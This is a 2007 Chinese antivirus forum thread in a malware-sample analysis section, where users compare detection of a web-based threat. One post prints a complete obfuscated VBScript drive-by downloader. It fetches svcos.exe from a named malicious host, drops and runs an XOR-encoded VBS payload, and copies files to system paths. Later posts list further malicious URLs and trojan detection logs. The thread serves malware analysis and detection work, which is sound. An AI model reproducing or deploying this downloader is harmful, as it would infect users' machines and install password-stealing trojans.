收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) 红伞报,费尔不报?
123下一页
返回列表 发新帖
楼主: cbz107
 收起左侧

[已鉴定] 红伞报,费尔不报?

 关闭 [复制链接]
promised
发表于 2007-10-6 18:51:50 | 显示全部楼层
受不了
  1. <html>
  2. <head>
  3. <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
  4. <title></title>        
  5. </head><body>
  6. <script language=VBScript>
  7.   On Error Resume Next
  8. //////////////////////////////////////////////////////
  9. // I Love Your  TC-chenzi       //
  10. // I Love Your  TC-chenzi       //
  11. // I Love Your  TC-chenzi       //
  12. // I Love Your  TC-chenzi       //
  13. //////////////////////////////////////////////////////
  14. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  15.   vip = "http://book.uubks.cn/bu/svcos.exe"
  16. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  17.   Set ou = document.createElement("object")
  18. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  19.     ccc="clsid:BD96":lll="C556-65":sss="A3-11D":iii="0-983A-00C":ddd="04FC29E36":uso="Microsoft.X":pk="MLHTTp"
  20. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  21.   ou.SetAttribute "classid", ccc&lll&sss&iii&ddd
  22.   bnb=uso&pk
  23.   Set vips = ou.CreateObject(bnb,"")
  24. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  25.   vips.Open "GET", vip, False
  26. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  27.   vips.Send
  28. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  29.   Hi="c:\microsofts.bat"
  30.   love="c:\microsofts.vbs"
  31.   SS="Scripting."
  32. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  33.   cc="FileSyst"
  34. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  35.   rr="emObject"
  36. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  37.   Set Ho = ou.createobject(SS&cc&rr,"")
  38. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  39.   Set uxo = Ho.GetSpecialFolder(2)
  40. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  41.   RR="Adod"
  42. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  43.   NN="b.stream"
  44. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  45.   hpk=RR&NN
  46.   Set chenzi = ou.createobject(hpk,"")
  47. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  48.   chenzi.type=1
  49. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  50.   chenzi.Open
  51. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  52.   chenzi.Write vips.ResponseBody
  53. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  54.   chenzi.Savetofile Hi,2
  55. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  56.   chenzi.Close
  57. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  58.   chenzi.Type=2
  59. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  60.   chenzi.Open
  61. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  62.   chenzi.WriteText  "Function fan(loves)"&vbCrLf&"For i=1 to Len(loves) Step 2"&vbCrLf&"fan=fan & Chr(CLng(""&H"" & Mid(loves,i,2)) Xor 23)"&vbCrLf&"Next"&vbCrLf&"End Function"&vbCrLf&"chenzi=""587937526565786537457264627A723759726F631A1D44726337447F727B7B372A3754657276637258757D7274633F35406474657E676339447F727B7B353E1A1D447F727B7B396562793F35742D4B7A7E746578647871636439757663353E1A1D64726337447F727B7B2A5978637F7E79701A1D44726337716478372A3754657276637258757D7274633F354474657E67637E797039517E7B72446E6463727A58757D727463353E1A1D404474657E676339447B7272673726272727371A1D5E713771647839517E7B72526F7E6463643F35742D4B7A7E746578647871636439757663353E37437F7279377164783953727B726372517E7B723F35742D4B7A7E746578647871636439757663353E1A1D7164783953727B726372517E7B723F404474657E6763394474657E676359767A723E"""&vbCrLf&"Execute fan(chenzi)"
  63. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  64.   chenzi.Savetofile love,2
  65. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  66.   chenzi.Savetofile "c:\\NTDETECT.EXE",2
  67. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  68.   chenzi.Close
  69.   we="Shell.Applica"
  70. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  71.   Set run = ou.createobject(we&"tion","")
  72.   kkk="Op"
  73.   lll="en"
  74. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  75.   run.Shellexecute love,"","",kkk&lll,0
  76. 'I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your I'Love your
  77. //////////////////////////////////////////////////////
  78. // I Love Your  TC-chenzi       //
  79. // I Love Your  TC-chenzi       //
  80. // I Love Your  TC-chenzi       //
  81. // I Love Your  TC-chenzi       //
  82. //////////////////////////////////////////////////////
  83.   </script>
  84. </body></html>
复制代码
回复

举报

jimmyleo
发表于 2007-10-6 18:52:25 | 显示全部楼层
哎呀~ 怪不得…… 忘了判断>情况了……
嘿嘿修正了~

[ 本帖最后由 jimmyleo 于 2007-10-6 18:58 编辑 ]
回复

举报

qigang
发表于 2007-10-6 18:53:22 | 显示全部楼层
瑞星病毒查杀结果报告

清除病毒种类列表:

病毒: Worm.Win32.Agent.vji     

MAC地址:00:11:5B:F3:6D:69

用户来源:互联网

软件版本:19.43.50
回复

举报

solcroft
发表于 2007-10-6 18:54:01 | 显示全部楼层

回复 11楼 promised 的帖子

svcos.exe这个文件明最近倒流行
回复

举报

The EQs
发表于 2007-10-6 19:00:24 | 显示全部楼层
1.PNG
回复

举报

jimmyleo
发表于 2007-10-6 19:14:17 | 显示全部楼层
汗还有个chmblinder……

http://web.858656.com/120/333/43343.htm

内嵌mm
回复

举报

alaindelon
发表于 2007-10-6 19:18:08 | 显示全部楼层
貌似费尔还有不完善的地方。国产加油啊!
回复

举报

jimmyleo
发表于 2007-10-6 19:35:29 | 显示全部楼层
[link]bu/img.js
  [ani]http://book.uubks.cn/bu/ah.c
    [exe]http://book.uubks.cn/bu/vip.exe
  [link]http://book.uubks.cn/bu/img.htm
  [link]http://book.uubks.cn/bu/img1.htm

回复

举报

wangjay1980
发表于 2007-10-6 19:36:47 | 显示全部楼层
deleted: Trojan program Trojan-PSW.Win32.OnLineGames.efk        File: E:\&Iuml;&Acirc;&Ocirc;&Oslash;&raquo;ù&micro;&Oslash;\svcos.exe//UPX
deleted: Trojan program Trojan-Downloader.Win32.Agent.dex        File: E:\&Iuml;&Acirc;&Ocirc;&Oslash;&raquo;ù&micro;&Oslash;\1.exe//UPack
deleted: Trojan program Trojan-Downloader.Win32.Agent.dex        File: E:\&Iuml;&Acirc;&Ocirc;&Oslash;&raquo;ù&micro;&Oslash;\smss1.exe//UPack
回复

举报

cbz107
 楼主| 发表于 2007-10-6 20:28:34 | 显示全部楼层

回复 11楼 promised 的帖子

费尔报了这段代码
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-23 15:08 , Processed in 0.103091 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表